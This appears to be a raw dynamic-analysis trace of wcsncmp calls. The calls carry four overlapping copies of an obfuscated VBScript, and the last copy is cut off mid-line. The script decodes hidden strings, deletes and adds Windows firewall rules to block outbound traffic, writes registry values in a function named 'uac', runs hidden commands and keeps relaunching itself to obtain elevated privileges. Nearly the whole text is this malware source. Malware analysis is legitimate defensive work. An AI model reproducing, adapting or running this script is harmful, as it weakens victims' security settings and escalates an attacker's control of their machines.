bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0222.931] wcsncmp (_String1="unction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0222.931] wcsncmp (_String1="nction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.931] wcsncmp (_String1="ction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0222.932] wcsncmp (_String1="tion bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf 